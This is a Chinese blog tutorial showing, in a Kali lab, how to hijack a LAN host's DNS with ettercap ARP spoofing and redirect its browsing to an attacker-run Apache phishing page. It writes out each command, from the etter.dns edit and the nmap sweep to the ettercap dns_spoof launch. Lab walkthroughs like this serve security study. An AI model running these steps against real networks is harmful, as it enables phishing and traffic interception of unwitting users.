内网渗透之dns劫持

本文详细介绍了如何进行DNS劫持,通过Kali Linux和Ettercap工具,实现将目标主机的网络流量重定向到黑客的Apache2服务器上,以此进行钓鱼攻击。操作步骤包括启动Apache服务、制作钓鱼网页、修改ettercap DNS配置、扫描目标IP、发起ARP欺骗。此过程揭示了网络安全中DNS欺骗的潜在威胁。
摘要由CSDN通过智能技术生成

DNS欺骗,被攻击的主机访问任意网站的回被转到特定的钓鱼网站,

实验工具:
kali linux 黑客机
win10 肉鸡
apache2
ettercap

操作步骤
1,打开kali上的apache2服务,
@kali:~# service apache2 start
root@kali:~# service apache2 status
绿点就是已经开启了。
在这里插入图片描述

2,制作网页,钓鱼网页不回做,就随便做了一个,命令如下
@kali:~#vim /var/www/html/index.html
在这里插入图片描述

3,修改ettercap DNS文件;
ot@kali:~# vim /etc/ettercap/etter.dns
A 192.168.1.112 (黑客机IP地址)
在这里插入图片描述

4,寻找目标IP
kali:~# nmap -sP 192.168.1.1-255

5,发起欺骗
kali:~# ettercap -i eth0 -T -P dns_spoof -M arp /192.168.1.132///
IP地址是被攻击的主机,

6,被攻击的主机访问任意网站的回被劫持,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值